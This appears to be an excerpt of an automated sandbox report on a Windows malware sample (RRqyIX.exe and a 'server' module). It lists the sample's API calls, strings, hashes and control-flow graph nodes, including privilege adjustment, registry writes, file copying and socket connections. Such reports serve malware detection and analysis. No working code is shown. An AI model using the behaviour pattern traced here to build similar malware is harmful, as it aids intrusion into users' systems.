              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,00AE1400), ref: 00AE12F5
              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00AE1400), ref: 00AE130A
              Strings
              • C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE1262
              • ntdll.dll, xrefs: 00AE1219
              • ZwQuerySystemInformation, xrefs: 00AE1212
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
              • String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe$ZwQuerySystemInformation$ntdll.dll
              • API String ID: 1500695312-1125738525
              • Opcode ID: bc43459f18e7fc3a0a14731275bcf7bfd29c0ec9140414bbf227d350b55a71b6
              • Instruction ID: 8ff5b6c05890d3dd671d54e2b43a99c9f7a18b07b607b3edaa5e440c22c2868a
              • Opcode Fuzzy Hash: bc43459f18e7fc3a0a14731275bcf7bfd29c0ec9140414bbf227d350b55a71b6
              • Instruction Fuzzy Hash: 7A21D7726053A1ABDB20DB96DC48FAFBAA8FB45B11F400928F645EB240C770DA45C7A5
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,00AE29DB,?,00000001), ref: 00AE26A7
              • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,00AE29DB,?,00000001), ref: 00AE26B5
              • lstrlen.KERNEL32(?), ref: 00AE26C4
              • ??2@YAPAXI@Z.MSVCRT ref: 00AE26CE
              • lstrcpy.KERNEL32(00000004,?), ref: 00AE26E3
              • lstrcpy.KERNEL32(?,00000004), ref: 00AE271F
              • ??3@YAXPAX@Z.MSVCRT ref: 00AE272D
              • SetEvent.KERNEL32 ref: 00AE273C
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
              • String ID:
              • API String ID: 41106472-0
              • Opcode ID: c3d8361641fc17974fb0747937f855ae1fb0194e1bec0ca255045f10b60a934e
              • Instruction ID: 1551ca18c09a50e8a0c3236c9b9489ad187a986dd74babc1e021340fa70632ee
              • Opcode Fuzzy Hash: c3d8361641fc17974fb0747937f855ae1fb0194e1bec0ca255045f10b60a934e
              • Instruction Fuzzy Hash: E1116D76500290EFCB32DF96EDC89AA7BBEFB887217144115F8589F120D7709D86DB90
              APIs
              Strings
              • .exe, xrefs: 00AE1C57
              • wkcYJpeHoCOlEOnjzTXdmIRlYsDUVMLhTbCPAWytDyFiSzkglMoByPuscUzdEQeiBtFgXfvgsaWqnqMKIkhjfvVSRGAofGWBRXxLeNbiUZItaDOqxGbrNPmrZKrJxmjdHSQTYZKapJupFnEcQHwAwVhLNCvu, xrefs: 00AE1B8A, 00AE1B9C, 00AE1C15, 00AE1C49
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: lstrcatmemcpymemsetrandsrand
              • String ID: .exe$wkcYJpeHoCOlEOnjzTXdmIRlYsDUVMLhTbCPAWytDyFiSzkglMoByPuscUzdEQeiBtFgXfvgsaWqnqMKIkhjfvVSRGAofGWBRXxLeNbiUZItaDOqxGbrNPmrZKrJxmjdHSQTYZKapJupFnEcQHwAwVhLNCvu
              • API String ID: 122620767-1506007127
              • Opcode ID: 2bc7f6f78d8c2d9acc94cb8ebc27dc1a6125b682403b65fda97e099d0ca12e41
              • Instruction ID: 96cdaf1dbfcab8116c52cf453694b566ef93f54d9844b217511f95a7f8fb787e
              • Opcode Fuzzy Hash: 2bc7f6f78d8c2d9acc94cb8ebc27dc1a6125b682403b65fda97e099d0ca12e41
              • Instruction Fuzzy Hash: 4C216833E442E06EE226933BACC0BAE3B489FEB721F254099F5954F192D17409938361
              APIs
              • memset.MSVCRT ref: 00AE18B1
              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 00AE18D3
              • CloseHandle.KERNEL32(00AE2549), ref: 00AE18E9
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AE18F0
              • GetExitCodeProcess.KERNEL32(?,00AE2549), ref: 00AE1901
              • CloseHandle.KERNEL32(?), ref: 00AE190A
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
              • String ID:
              • API String ID: 876959470-0
              • Opcode ID: 6ad2a1549c3b8b9f5d229a215bed0ec1bba44749786ab14c4ad96fb28e73b46b
              • Instruction ID: 1d763bd0fa1db7d18c358276fa58755e5df3048a4253493703887930a59a81a0
              • Opcode Fuzzy Hash: 6ad2a1549c3b8b9f5d229a215bed0ec1bba44749786ab14c4ad96fb28e73b46b
              • Instruction Fuzzy Hash: 78015A729011A8BBCF21ABD6DC48DEFBF3DEB85720F104021FA15A61A0D6714A19CBA0
              APIs
              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00AE1334
              • GetProcAddress.KERNEL32(00000000), ref: 00AE133B
              • memset.MSVCRT ref: 00AE1359
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: AddressHandleModuleProcmemset
              • String ID: NtSystemDebugControl$ntdll.dll
              • API String ID: 3137504439-2438149413
              • Opcode ID: 8a3adf4485680713a00b3d119f9a003dfd24e45ec2865c7e35d5a3d8e10fe74a
              • Instruction ID: cf9b175183f129de0d1410b4d9e603aeac91308ee4f2c17a1a47072de7fc3d11
              • Opcode Fuzzy Hash: 8a3adf4485680713a00b3d119f9a003dfd24e45ec2865c7e35d5a3d8e10fe74a
              • Instruction Fuzzy Hash: 98015B7260029ABFDF10DF96AC89A6FBBACFB45314F00456AF911AA141E27086558B51
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: strrchr$lstrcmpilstrcpylstrlen
              • String ID:
              • API String ID: 3636361484-0
              • Opcode ID: 2297c51745b9d46fdbab0343b525e3272e0de2118e606a55a5bb0d8c2a504811
              • Instruction ID: 373938d71841a18fa051e878649237c7da5948c41b9fe651219f64af4aa7faaa
              • Opcode Fuzzy Hash: 2297c51745b9d46fdbab0343b525e3272e0de2118e606a55a5bb0d8c2a504811
              • Instruction Fuzzy Hash: FA01DB739042A56FDF10D760DC48BE6779CDB04310F440065F945D7090D6749E858B90
              APIs
              • GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
              • srand.MSVCRT ref: 00AE1878
              • rand.MSVCRT ref: 00AE1880
              • srand.MSVCRT ref: 00AE1890
              • rand.MSVCRT ref: 00AE1894
              Memory Dump Source
              • Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: Timerandsrand$FileSystem
              • String ID:
              • API String ID: 4106363736-0
              • Opcode ID: 00206501626b8fa81447dadbc0e05e6abbdc81058ef757b0ce5956361dbf7e92
              • Instruction ID: 6240f7a49db1f0218f020682c8272682e98df545d1ca7e5d0886a3e3e8ab59b3
              • Opcode Fuzzy Hash: 00206501626b8fa81447dadbc0e05e6abbdc81058ef757b0ce5956361dbf7e92
              • Instruction Fuzzy Hash: 6BE04877A10218BBDB00E7F9EC8A99EBBACDE84161B110567F600D3254E574FD458BB4
              APIs
              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00AE603C
              • GetProcAddress.KERNEL32(00000000,00AE6064), ref: 00AE604F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: kernel32.dll
              • API String ID: 1646373207-1793498882
              • Opcode ID: 254e83e023be0b14e37026dee7b709b039a573018019ff4d03e5699e77b7a161
              • Instruction ID: ee80a65920f88128ecf1fdaa23a52210d69a4cf557e80c99bed413c2c8debd6c
              • Opcode Fuzzy Hash: 254e83e023be0b14e37026dee7b709b039a573018019ff4d03e5699e77b7a161
              • Instruction Fuzzy Hash: 9BF0F0F11402D99FEF70CFA9CC44BDE3BE4EB25750F50482AEA09CB281CB3486058B25

              Execution Graph

              Execution Coverage:30%
              Dynamic/Decrypted Code Coverage:86%
              Signature Coverage:13.1%
              Total number of Nodes:107
              Total number of Limit Nodes:5
              execution_graph 25509 d9b45a 25512 d9b495 SendMessageTimeoutA 25509->25512 25511 d9b4dd 25512->25511 25579 d9a59a 25580 d9a5d8 DuplicateHandle 25579->25580 25581 d9a610 25579->25581 25582 d9a5e6 25580->25582 25581->25580 25513 3aa1aae 25514 3aa1ae3 GetProcessTimes 25513->25514 25516 3aa1b15 25514->25516 25583 3aa0eee 25584 3aa0f26 WSASocketW 25583->25584 25586 3aa0f62 25584->25586 25517 d9a65e 25518 d9a68a OleInitialize 25517->25518 25519 d9a6c0 25517->25519 25520 d9a698 25518->25520 25519->25518 25587 a19de8 25588 a19e13 25587->25588 25591 a19a34 25588->25591 25590 a19e6b 25592 a19a49 25591->25592 25593 a19a6f NtCreateFile 25591->25593 25592->25590 25593->25592 25594 d9aa12 25595 d9aa3e SetErrorMode 25594->25595 25596 d9aa67 25594->25596 25597 d9aa53 25595->25597 25596->25595 25598 a1996a NtClose 25525 3aa1ebe 25526 3aa1ef3 GetExitCodeProcess 25525->25526 25528 3aa1f1c 25526->25528 25599 3aa1c7e 25600 3aa1cb3 WSAConnect 25599->25600 25602 3aa1cd2 25600->25602 25603 3aa207e 25604 3aa20b3 SetProcessWorkingSetSize 25603->25604 25606 3aa20df 25604->25606 25529 d9b8ce 25530 d9b8f4 DeleteFileW 25529->25530 25532 d9b910 25530->25532 25607 d9b982 25608 d9b9ab SetFileAttributesW 25607->25608 25610 d9b9c7 25608->25610 25611 d9be02 25613 d9be2e K32EnumProcesses 25611->25613 25614 d9be4a 25613->25614 25533 d9bec6 25534 d9befb NtQuerySystemInformation 25533->25534 25535 d9bf26 25533->25535 25536 d9bf10 25534->25536 25535->25534 25537 d9b746 25538 d9b76f CopyFileW 25537->25538 25540 d9b796 25538->25540 25615 d9bc86 25616 d9bcb5 AdjustTokenPrivileges 25615->25616 25618 d9bcd7 25616->25618 25619 d9bb06 25621 d9bb2f LookupPrivilegeValueW 25619->25621 25622 d9bb56 25621->25622 25541 d9b27e 25543 d9b2b3 RegQueryValueExW 25541->25543 25544 d9b307 25543->25544 25623 3aa1542 25624 3aa157a MapViewOfFile 25623->25624 25626 3aa15c9 25624->25626 25545 d9b372 25546 d9b3a7 RegSetValueExW 25545->25546 25548 d9b3f3 25546->25548 25549 d9b176 25550 d9b1ae RegOpenKeyExW 25549->25550 25552 d9b204 25550->25552 25553 3aa1f9a 25554 3aa1fcf GetProcessWorkingSetSize 25553->25554 25556 3aa1ffb 25554->25556 25557 d9ac6a 25560 d9ac9f GetFileType 25557->25560 25559 d9accc 25560->25559 25627 d9afaa 25629 d9afe2 CreateMutexW 25627->25629 25630 d9b025 25629->25630 25561 d9adee 25562 d9ae23 ReadFile 25561->25562 25564 d9ae55 25562->25564 25631 d9a72e 25632 d9a77e OleGetClipboard 25631->25632 25633 d9a78c 25632->25633 25565 3aa1392 25566 3aa13ca ConvertStringSecurityDescriptorToSecurityDescriptorW 25565->25566 25568 3aa140b 25566->25568 25634 3aa09d2 25635 3aa09fe DispatchMessageA 25634->25635 25636 3aa0a27 25634->25636 25637 3aa0a13 25635->25637 25636->25635 25569 a19c98 25570 a19cb3 25569->25570 25573 a19974 25570->25573 25574 a19996 NtSetInformationFile 25573->25574 25575 a19988 25573->25575 25574->25575 25576 3aa1e16 25577 3aa1e66 FormatMessageW 25576->25577 25578 3aa1e6e 25577->25578 25641 a199dc 25642 a199f1 25641->25642 25643 a19a0f NtReadFile 25641->25643 25643->25642 25644 d9aaa6 25647 d9aade CreateFileW 25644->25647 25646 d9ab2d 25647->25646
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$:@%l$:@%l$:@%l$:@%l$@$\OLl$2Ll
              • API String ID: 0-3567625124
              • Opcode ID: ba03bd7603ea82f00e8ceb5cad46cb5e814523cde9e508a7afd9be1edd6acfba
              • Instruction ID: b58074c65513c980bbc518dadf147b0efaed309218a58869f73935e133c1edbc
              • Opcode Fuzzy Hash: ba03bd7603ea82f00e8ceb5cad46cb5e814523cde9e508a7afd9be1edd6acfba
              • Instruction Fuzzy Hash: 79231674A412288FDB25DF20D8A4BADB7B6FB49308F0041EAD509A77A0DF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-4176283887
              • Opcode ID: b78b1de8f6a20859c3e6c6bd7ab30ef01a1db6c229401421451be1624b8892b0
              • Instruction ID: aca94dd3ef999887ceba40388db704195abd9f3616684bb17d90fd9b8fb04d26
              • Opcode Fuzzy Hash: b78b1de8f6a20859c3e6c6bd7ab30ef01a1db6c229401421451be1624b8892b0
              • Instruction Fuzzy Hash: 6A132774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A77A0CF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-4176283887
              • Opcode ID: b498e115d24f73cd70ba057ae1c9a1b13d825aa5545679bd6c90e5d88473bee0
              • Instruction ID: 703a3d13cb51ed03477a27c853c6eab1719267ff64c126f22e9f59c2e37e07dd
              • Opcode Fuzzy Hash: b498e115d24f73cd70ba057ae1c9a1b13d825aa5545679bd6c90e5d88473bee0
              • Instruction Fuzzy Hash: 18032774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A77A0CF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-4176283887
              • Opcode ID: cdf2dd14e31641f29bf2eab531025076bb09c9ee82a716671189eaa01ebd9625
              • Instruction ID: 642c128218253077311b5817a35efb674b99d0e275781c5d715ce968a2802356
              • Opcode Fuzzy Hash: cdf2dd14e31641f29bf2eab531025076bb09c9ee82a716671189eaa01ebd9625
              • Instruction Fuzzy Hash: 73032774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A77A0CF359E85CF51
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: 6227903391b4c78ddc17ae76f96d035a2ce2a4b41dd2bbd0bfd14420bbd692d7
              • Instruction ID: 7ca94811575ae64a91345e2b9567f77f8a24366ce880a3ec11c22f82531bd877
              • Opcode Fuzzy Hash: 6227903391b4c78ddc17ae76f96d035a2ce2a4b41dd2bbd0bfd14420bbd692d7
              • Instruction Fuzzy Hash: 3C032774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2677 2fd4707-2fd4819 2691 2fd481f-2fd4924 2677->2691 2692 2fd4967-2fd497b 2677->2692 2872 2fd492c 2691->2872 2693 2fd497d-2fd4983 call 2fd4208 2692->2693 2694 2fd49ce-2fd49e2 2692->2694 2701 2fd4988-2fd4993 2693->2701 2696 2fd4a2a-2fd4a3e 2694->2696 2697 2fd49e4-2fd49ef 2694->2697 2699 2fd4b8c-2fd4ba0 2696->2699 2700 2fd4a44-2fd4b49 2696->2700 2697->2696 2703 2fd4ccc-2fd4ce0 2699->2703 2704 2fd4ba6-2fd4bba 2699->2704 2911 2fd4b51 2700->2911 2701->2694 2708 2fd4f6c-2fd4f80 2703->2708 2709 2fd4ce6-2fd4f1a 2703->2709 2706 2fd4bbc-2fd4bc3 2704->2706 2707 2fd4bc8-2fd4bdc 2704->2707 2713 2fd4c40-2fd4c54 2706->2713 2714 2fd4bde-2fd4be5 2707->2714 2715 2fd4be7-2fd4bfb 2707->2715 2716 2fd4fda-2fd4fee 2708->2716 2717 2fd4f82-2fd4f89 2708->2717 3171 2fd4f25 2709->3171 2724 2fd4c6e-2fd4c7a 2713->2724 2725 2fd4c56-2fd4c6c 2713->2725 2714->2713 2719 2fd4bfd-2fd4c04 2715->2719 2720 2fd4c06-2fd4c1a 2715->2720 2722 2fd503d-2fd5051 2716->2722 2723 2fd4ff0-2fd4ff6 2716->2723 2743 2fd4f93 2717->2743 2719->2713 2728 2fd4c1c-2fd4c23 2720->2728 2729 2fd4c25-2fd4c39 2720->2729 2730 2fd509a-2fd50ae 2722->2730 2731 2fd5053 2722->2731 2723->2722 2734 2fd4c85 2724->2734 2725->2734 2728->2713 2729->2713 2736 2fd4c3b-2fd4c3d 2729->2736 2732 2fd5125-2fd5139 2730->2732 2733 2fd50b0-2fd50d9 2730->2733 2731->2730 2741 2fd53ac-2fd53c0 2732->2741 2742 2fd513f-2fd535b 2732->2742 2733->2732 2734->2703 2736->2713 2745 2fd5496-2fd54aa 2741->2745 2746 2fd53c6-2fd53d6 2741->2746 3118 2fd535d 2742->3118 3119 2fd535f 2742->3119 2743->2716 2749 2fd5667-2fd567b 2745->2749 2750 2fd54b0-2fd55df 2745->2750 3179 2fd53dc call 3970606 2746->3179 3180 2fd53dc call 39705df 2746->3180 2755 2fd57de-2fd57f2 2749->2755 2756 2fd5681-2fd578c 2749->2756 3089 2fd55ea-2fd5620 2750->3089 2760 2fd57f8-2fd5903 2755->2760 2761 2fd5955-2fd5969 2755->2761 3035 2fd5797 2756->3035 3053 2fd590e 2760->3053 2765 2fd5acc-2fd5ae0 2761->2765 2766 2fd596f-2fd5a7a 2761->2766 2771 2fd5ae6-2fd5bf1 2765->2771 2772 2fd5c43-2fd5c57 2765->2772 3059 2fd5a85 2766->3059 2768 2fd53e2-2fd5448 2855 2fd544f 2768->2855 3075 2fd5bfc 2771->3075 2777 2fd5c5d-2fd5d68 2772->2777 2778 2fd5dba-2fd5dce 2772->2778 3083 2fd5d73 2777->3083 2788 2fd5dd4-2fd5edf 2778->2788 2789 2fd5f31-2fd5f45 2778->2789 3095 2fd5eea 2788->3095 2793 2fd60a8-2fd60bc 2789->2793 2794 2fd5f4b-2fd6061 2789->2794 2801 2fd621f-2fd6233 2793->2801 2802 2fd60c2-2fd61cd 2793->2802 2794->2793 2808 2fd6239-2fd6344 2801->2808 2809 2fd6396-2fd63aa 2801->2809 3113 2fd61d8 2802->3113 3124 2fd634f 2808->3124 2817 2fd652e-2fd6542 2809->2817 2818 2fd63b0-2fd63f5 call 2fd4270 2809->2818 2829 2fd6548-2fd6567 2817->2829 2830 2fd6685-2fd6699 2817->2830 2949 2fd64b5-2fd64d7 2818->2949 2865 2fd660c-2fd662e 2829->2865 2842 2fd669f-2fd679f 2830->2842 2843 2fd67e6-2fd67fa 2830->2843 2842->2843 2851 2fd6947-2fd695b 2843->2851 2852 2fd6800-2fd6900 2843->2852 2859 2fd6aa8-2fd6ad2 2851->2859 2860 2fd6961-2fd6a61 2851->2860 2852->2851 2855->2745 2891 2fd6ad8-2fd6b4b 2859->2891 2892 2fd6b92-2fd6ba6 2859->2892 2860->2859 2870 2fd656c-2fd657b 2865->2870 2871 2fd6634 2865->2871 2888 2fd6636 2870->2888 2889 2fd6581-2fd6585 2870->2889 2871->2830 2872->2692 2907 2fd663b-2fd6683 2888->2907 2913 2fd6590-2fd65b4 2889->2913 2891->2892 2895 2fd6bac-2fd6c03 2892->2895 2896 2fd6c83-2fd6c97 2892->2896 3026 2fd6c0a-2fd6c3c 2895->3026 2914 2fd6ddd-2fd6df1 2896->2914 2915 2fd6c9d-2fd6d96 2896->2915 2907->2830 2911->2699 2980 2fd65fb-2fd6604 2913->2980 2981 2fd65b6-2fd65f0 2913->2981 2923 2fd7054-2fd7068 2914->2923 2924 2fd6df7-2fd6e47 2914->2924 2915->2914 2933 2fd706e-2fd7109 call 2fd4270 * 2 2923->2933 2934 2fd7150-2fd7157 2923->2934 3036 2fd6e49-2fd6e6f 2924->3036 3037 2fd6eb5-2fd6ee0 2924->3037 2933->2934 2965 2fd64dd 2949->2965 2966 2fd63fa-2fd6409 2949->2966 2965->2817 2974 2fd64df 2966->2974 2975 2fd640f-2fd646f 2966->2975 3001 2fd64e4-2fd652c 2974->3001 3092 2fd6479-2fd64ad 2975->3092 2980->2907 2983 2fd6606 2980->2983 2981->2980 2983->2865 3001->2817 3026->2896 3035->2755 3111 2fd6e71-2fd6e91 3036->3111 3112 2fd6eb0 3036->3112 3116 2fd6fbe-2fd704f 3037->3116 3117 2fd6ee6-2fd6fb9 3037->3117 3053->2761 3059->2765 3075->2772 3083->2778 3089->2749 3092->3001 3110 2fd64af 3092->3110 3095->2789 3110->2949 3111->3112 3112->2923 3113->2801 3116->2923 3117->2923 3123 2fd5365 3118->3123 3119->3123 3123->2741 3124->2809 3171->2708 3179->2768 3180->2768
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: c31372f84f87378edc5b06d333c8057bb90bd5e4bbecab15bd9d8a2f8d10e545
              • Instruction ID: 27bf8fe6fab86384b60bca11b0e13528f633c62942eb4f72315e19a762c61949
              • Opcode Fuzzy Hash: c31372f84f87378edc5b06d333c8057bb90bd5e4bbecab15bd9d8a2f8d10e545
              • Instruction Fuzzy Hash: 6DF22774A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 3181 2fd47cc-2fd4819 3188 2fd481f-2fd4924 3181->3188 3189 2fd4967-2fd497b 3181->3189 3369 2fd492c 3188->3369 3190 2fd497d-2fd4983 call 2fd4208 3189->3190 3191 2fd49ce-2fd49e2 3189->3191 3198 2fd4988-2fd4993 3190->3198 3193 2fd4a2a-2fd4a3e 3191->3193 3194 2fd49e4-2fd49ef 3191->3194 3196 2fd4b8c-2fd4ba0 3193->3196 3197 2fd4a44-2fd4b49 3193->3197 3194->3193 3200 2fd4ccc-2fd4ce0 3196->3200 3201 2fd4ba6-2fd4bba 3196->3201 3408 2fd4b51 3197->3408 3198->3191 3205 2fd4f6c-2fd4f80 3200->3205 3206 2fd4ce6-2fd4f1a 3200->3206 3203 2fd4bbc-2fd4bc3 3201->3203 3204 2fd4bc8-2fd4bdc 3201->3204 3210 2fd4c40-2fd4c54 3203->3210 3211 2fd4bde-2fd4be5 3204->3211 3212 2fd4be7-2fd4bfb 3204->3212 3213 2fd4fda-2fd4fee 3205->3213 3214 2fd4f82-2fd4f89 3205->3214 3668 2fd4f25 3206->3668 3221 2fd4c6e-2fd4c7a 3210->3221 3222 2fd4c56-2fd4c6c 3210->3222 3211->3210 3216 2fd4bfd-2fd4c04 3212->3216 3217 2fd4c06-2fd4c1a 3212->3217 3219 2fd503d-2fd5051 3213->3219 3220 2fd4ff0-2fd4ff6 3213->3220 3240 2fd4f93 3214->3240 3216->3210 3225 2fd4c1c-2fd4c23 3217->3225 3226 2fd4c25-2fd4c39 3217->3226 3227 2fd509a-2fd50ae 3219->3227 3228 2fd5053 3219->3228 3220->3219 3231 2fd4c85 3221->3231 